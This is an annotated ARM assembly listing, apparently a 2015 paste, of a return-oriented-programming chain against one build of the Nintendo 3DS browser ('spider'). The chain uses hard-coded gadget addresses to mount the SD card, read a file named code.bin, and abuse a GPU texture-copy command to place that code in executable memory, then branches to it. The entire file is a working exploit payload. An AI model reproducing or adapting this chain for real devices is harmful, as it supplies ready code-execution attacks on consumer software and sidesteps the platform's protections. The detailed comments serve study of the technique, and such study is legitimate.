
17552/v3088 Spider LoadCode ROP

a guest
May 24th, 2015
    .arm
    .section .rodata.rop

@ Region constants used by the chain below. Every address in this file
@ (these regions and all gadget/function addresses) is hard-coded for one
@ target build and will not hold on any other build.
@ BUFFER_LOC  : staging buffer that the file is read into
@ CODE_SIZE   : byte count read from the file and copied by the GX command
@ CODE_TARGET : destination of the GX texture copy (see gxCommand)
@ CODE_JUMP   : address the chain finally branches to (relation to
@               CODE_TARGET is not shown in this file; presumably the
@               CPU-visible mapping of the same memory - confirm)
#define BUFFER_LOC 0x18410000
#define CODE_SIZE 0x00004000
#define CODE_TARGET 0x19592000
#define CODE_JUMP 0x009D2000

    .global _start
@---------------------------------------------------------------------------------
@ _start: the ROP chain proper. Each outdented .word is a gadget or function
@ address that is popped into PC; the indented .word lines beneath it are the
@ values popped into the registers named in their comments (0xDEADBEEF and
@ 0xDEADC0DE mark registers whose value does not matter).
@ Flow: mount SD -> open FileName -> read CODE_SIZE bytes into BUFFER_LOC ->
@ flush data cache -> enqueue gxCommand (GPU copy BUFFER_LOC -> CODE_TARGET) ->
@ sleep -> branch to CODE_JUMP.
@ Before each real call, lr is set to the pop {pc} gadget (0x001057E0) so the
@ callee returns into the next chain entry.
@ Return values of FS_MOUNTSDMC, IFile_Open and IFile_Read are never examined;
@ on failure the chain still proceeds to the copy and the final branch.
@ Layout is load-bearing: InitData below embeds _start+0x8C and _start+0x218,
@ so inserting or removing any word in this chain shifts those offsets.
_start:
    @ mount SD
        .word 0x0010C320 @ LDMFD   SP!, {R0,PC}
            .word 0x001050CB @ R0 = "dmc:"
        .word 0x0019CA2C @ FS_MOUNTSDMC(), then LDMFD   SP!, {R3-R5,PC}
            .word 0xDEADBEEF @ R3, dummy
            .word 0xDEADBEEF @ R4, dummy
            .word 0xDEADBEEF @ R5, dummy
    @ open file
        .word 0x001946E3 @ POP     {R0-R4,R7,PC}
            .word 0x08F10000 @ R0 = this
            .word FileName @ R1 = filename
            .word 0x00000001 @ R2 = permission
            .word 0xDEADBEEF @ R3, dummy
            .word 0xDEADBEEF @ R4, dummy
            .word 0xDEADBEEF @ R7, dummy
        .word 0x0022FE48 @ IFile_Open(), then LDMFD   SP!, {R4-R7,PC}
            .word 0xDEADBEEF @ R4, dummy
            .word 0xDEADBEEF @ R5, dummy
            .word 0xDEADBEEF @ R6, dummy
            .word 0xDEADBEEF @ R7, dummy
        .word 0x001057E0 @ POP {PC}
    @ read payload
        .word 0x001946E3 @ POP     {R0-R4,R7,PC}
            .word 0x08F10000 @ R0 = this
            .word 0x08F10020 @ R1 = total_read (written by IFile_Read; not checked afterwards, so a short read goes unnoticed)
            .word BUFFER_LOC @ R2 = buffer
            .word CODE_SIZE @ R3 = size
            .word 0xDEADBEEF @ R4, dummy
            .word 0xDEADBEEF @ R7, dummy
        .word 0x001686C4 @ IFile_Read, then LDMFD   SP!, {R4-R9,PC}
            .word 0xDEADBEEF @ R4, dummy
            .word 0xDEADBEEF @ R5, dummy
            .word 0xDEADBEEF @ R6, dummy
            .word 0xDEADBEEF @ R7, dummy
            .word 0xDEADBEEF @ R8, dummy
            .word 0xDEADBEEF @ R9, dummy
    @ flush data cache
    @ (same range that was just read; presumably so the GPU copy below sees
    @ the fresh bytes rather than stale memory)
        .word 0x0012A3D4 @ pop {r0, r1, r2, r3, r4, pc}
            .word 0x003DA72C @ r0 (handle ptr)
            .word 0xFFFF8001 @ r1 (kprocess handle)
            .word BUFFER_LOC  @ r2 (address)
            .word CODE_SIZE @ r3 (size)
            .word 0xDEADC0DE @ r4 (garbage)
        .word 0x001303A4 @ pop {lr, pc}
            .word 0x001057E0 @ lr (pop {pc})
        .word 0x0012c228 @ GSPGPU_FlushDataCache
    @ send GX command
    @ (gxCommand describes a copy BUFFER_LOC -> CODE_TARGET; nothing on the
    @ CPU side writes CODE_TARGET, so this enqueue is what places the payload)
        .word 0x0010c320 @ pop {r0, pc}
            .word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
        .word 0x00228B10 @ pop {r1, pc}
            .word gxCommand @ r1 (cmd addr)
        .word 0x001303A4 @ pop {lr, pc}
            .word 0x001057E0 @ lr (pop {pc})
        .word 0x0012BF4C @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
    @ sleep for a bit
    @ (gives the enqueued copy time to complete; no completion check is made)
        .word 0x0010c320 @ pop {r0, pc}
            .word 1000000000  @ r0 (one second; presumably a nanosecond count - confirm against svc 0xa)
        .word 0x00228B10 @ pop {r1, pc}
            .word 0x00000000 @ r1 (nothing)
        .word 0x001303A4 @ pop {lr, pc}
            .word 0x001057E0 @ lr (pop {pc})
        .word 0x0010420C @ svc 0xa | bx lr
    @ jump to code
        .word CODE_JUMP

@ Data required for spider rop to work
@ The meaning of the individual slots is not documented in this file. What is
@ visible: the table embeds the chain entry (_start), two fixed offsets into
@ the chain (_start+0x8C, _start+0x218), the pop {pc} gadget 0x001057E0 and
@ the pop {r0,pc} gadget 0x0010C320 used in _start, 0x00130344 (not described
@ anywhere in this file), and a self-pointer at Self.
@ The two _start+N entries are why the length of the chain in _start must not
@ change; _start+0x218 lies past the end of the .rodata.rop words, so where it
@ lands also depends on the linker layout of the sections.
    .section .rodata.init
InitData:
    .word 0, 0, 0, 0, _start+0x8C, 0, 0, 0, 0, 0
    .word 0, 0, 0, 0, 0, 0, 0, _start, 0x001057E0, 0x001057E0, 0, 0, 0, 0, 0, 0
    .word 0, 0, 0, 0x0010C320, _start+0x218, 0, 0, 0x001057E0, 0, 0, 0, 0, 0, 0, 0, 0
    .word 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
    .word 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
Self:
    .word Self, 0x001057E0, 0, 0, 0, 0, 0, 0, 0, 0x00130344, 0, 0, 0, 0, 0

    .section .rodata
    .align 2
@ GX command block handed (in r1) to TryEnqueue in _start. Per the field
@ comments it requests a copy of CODE_SIZE bytes from BUFFER_LOC to
@ CODE_TARGET. The 0xFFFFFFFF dimensions and the 0x8 flags value are passed
@ as-is; their meaning is not documented in this file.
gxCommand:
    .word 0x00000004 @ command header (SetTextureCopy)
    .word BUFFER_LOC @ source address
    .word CODE_TARGET @ destination address
    .word CODE_SIZE @ size
    .word 0xFFFFFFFF @ dim in
    .word 0xFFFFFFFF @ dim out
    .word 0x00000008 @ flags
    .word 0x00000000 @ unused

    .align 2
@ Path passed to IFile_Open (R1). Emitted as 16-bit characters (.string16);
@ "dmc:" is the mount created by the first step of the chain.
FileName:
    .string16 "dmc:/code.bin"

    .align 2
@ Padding
@ (trailing zero words; no label refers to them, so they only affect the
@ section size)
    .word 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
    .word 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
    .word 0, 0, 0, 0